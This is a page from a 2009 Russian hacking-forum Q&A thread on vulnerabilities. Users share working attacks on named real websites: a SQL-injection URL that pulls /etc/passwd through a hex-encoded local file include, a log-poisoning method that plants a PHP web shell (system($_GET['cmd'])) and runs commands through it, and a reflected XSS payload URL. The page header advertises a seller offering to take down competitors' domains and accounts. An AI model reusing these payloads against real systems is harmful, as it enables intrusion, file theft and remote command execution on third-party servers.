УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 951 из 2438

951

Опции темы

Поиск в этой теме

Опции просмотра

#9501

21.10.2009, 16:56

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

Цитата:

Сообщение от Strilo4ka

а по поводу include что то не понятно мне пока...

Цитата:

Сообщение от AFoST

о ептыть тут еще инклуд есть
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database (),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737 37764,3,4,5--+-&lan=ukr

в php-файле, который исполняется есть строчки примерно такие:

PHP код:


		
			
mysql_query("select pole1,pole2 from table1 where id_doc=".$_GET[id_doc]);

далее
$pole2 = присваивается значение 2 поля.
после этого идёт локаьный инклуд файла

PHP код:


		
			
main('../'.$pole2);

Мы запросом

PHP код:


		
			
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764,3,4,5--+-&lan=ukr

делаем так, чтобы основной запрос вернул ложь, а UNION SELECT запрос вернул данные которые нам нужны.
В поле, значение которого потом инклудится, вносим HEX значение строки, так как с ковычками не получилось.

PHP код:


		
			
0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764

это равно

../../../../../etc/passwd

соответственно, подставляя во 2 поле в sql-injection путь до искомого файла, он инклудится.
Что непонятно - спрашивай.

__________________
Появляюсь редко. Важные дела в реале.

Последний раз редактировалось AFoST; 21.10.2009 в 16:58..

#9502

21.10.2009, 19:13

Ctacok

Moderator - Level 7

Регистрация: 19.12.2008

Сообщений: 1,203

Провел на форуме:
5011696

Репутация: 2221

Цитата:

Сообщение от Strilo4ka

кстати а этот коментарий /* в запросе нельзя было использовать... Да выводит ошыбку, типа слеш служебный наверно. А че так??? да понятно что надо еще поросчихлять.

Хотя бы есть выбор:
--
{
%23
#

#9503

21.10.2009, 19:13

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Цитата:

Сообщение от Strilo4ka

теперь догнал AFoST

. только не 0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737377 64, а 2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 . Пробела нет перед 64. Оно наверно неправильно вставилось когда пост писался. Только что пропустил через bin2hex("../../../../../etc/passwd");. Кстати и что на ети данные дают интересно, как их использовать. что любой файл на хостинге прочитать можно это понятно. но это не GLOBAL INJECTION, толку от нее... Просто интересно для загального развития AFoST:

1. форум античата в длинных строках вставляет пробелы.
2. А про local file include почитай на форуме есть. Скажу одно - это огромный плюс!

__________________
Появляюсь редко. Важные дела в реале.

#9504

21.10.2009, 20:12

bons

Участник форума

Регистрация: 20.12.2007

Сообщений: 295

Провел на форуме:
1777055

Репутация: 347

Цитата:

Сообщение от Strilo4ka

ребята что нам дает файл passwd. В принцыпе в гугде поискать не проблема,а так в 5-ти словах. Знаю что пароля там нет. Там выведено даные о пользователях и слубы или что ??? а пароль в файле shadow наскольку я знаю. Тоэсть не пароль а хешы паролей.

Ctacok , а что разве в mysql 5 версии { скобка это коментарий?

скобка не есть комментарий
файл passwd даст список юзеров системы, а иногда эта информация может помочь.

#9505

21.10.2009, 22:49

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Цитата:

Сообщение от Strilo4ka

AFoST,чисто теоретический вопрос(думаю пост удален не будет): Возможно ли через лог файл поднять привилегии используя эту локальную иньекцию кода на сайте. Интересно все что после ? в URL будет записываться в лог. По умолчанию оно записываеться??? На денверер я обобщаю (апач) кажеться не.... А там допустим прописать <? system($_GET['cmd']); ?>, а потом подключить лог файл передав строку в HEX. И главный когда встретит инструкции PHP кода он их передаст интерпрератору таким образом получиться передавать переменную cmd через гет. А в значение прописывать команды DOS, допустим или linux. Я правц?

Да, это известный прием инклуда лог файла.
1. находим инклуд
2. находим логи /path/log/access_log
3. запрос с cmd на сайт http://site/? ...
4. инклудим через инклуд, найденный в п.1. access_log
http://site/include.php?include=/path/log/acces_log&cmd=ls+-lia

upd ты права таким способом не поднимаешь, ты просто выполняешь php.

ps Изъясняй мысли правильней!!! Я с 5го прочтения тебя понимаю!!!

__________________
Появляюсь редко. Важные дела в реале.

Последний раз редактировалось AFoST; 21.10.2009 в 22:53..

#9506

22.10.2009, 03:26

Totgeliebt

Познающий

Регистрация: 20.10.2009

Сообщений: 38

Провел на форуме:
125847

Репутация: 5

Вот посмотрите пожалуйста, мне кажется это пассивная XSS?просто я в этом вообще не разбераюсь =))
http://la2.sz.ru/news.php?%22%3E%3Cscript%3Ealert()%3C/script%3Ereadmore=99

#9507

22.10.2009, 04:40

gisTy

Постоянный

Регистрация: 24.05.2008

Сообщений: 589

Провел на форуме:
3629857

Репутация: 504

Цитата:

Сообщение от Totgeliebt

нет

#9508

22.10.2009, 11:23

DeluxeS

Участник форума

Регистрация: 01.08.2009

Сообщений: 183

Провел на форуме:
1483264

Репутация: 131

Подкиньте статей по LFI. А то ничего найти не могу =(

#9509

22.10.2009, 11:41

Qwazar

Leaders of Antichat - Level 4

Регистрация: 02.06.2005

Сообщений: 1,411

Провел на форуме:
10605912

Репутация: 4693

Цитата:

Сообщение от DeluxeS

Подкиньте статей по LFI. А то ничего найти не могу =(

Вот в общем на milw0rm'е: http://milw0rm.com/papers/260
Довольно свежая статья от M4g,а: http://www.xakep.ru/post/49508/default.asp
Замечание от .Slip'а: https://forum.antichat.ru/thread99589.html
Вот заметка от Raz0r'а: http://raz0r.name/articles/null-byte-alternative/
Вот от [x26]VOLAND: https://forum.antichat.ru/thread119481.html
Так-же в FAQ от jokester'а: https://forum.antichat.ru/thread104591.html

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 22.10.2009 в 11:49..

#9510

22.10.2009, 15:41

Qwazar

Leaders of Antichat - Level 4

Регистрация: 02.06.2005

Сообщений: 1,411

Провел на форуме:
10605912

Репутация: 4693

Strilo4ka, Начни с https://forum.antichat.ru/thread104591.html

Страница 951 из 2438

951

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход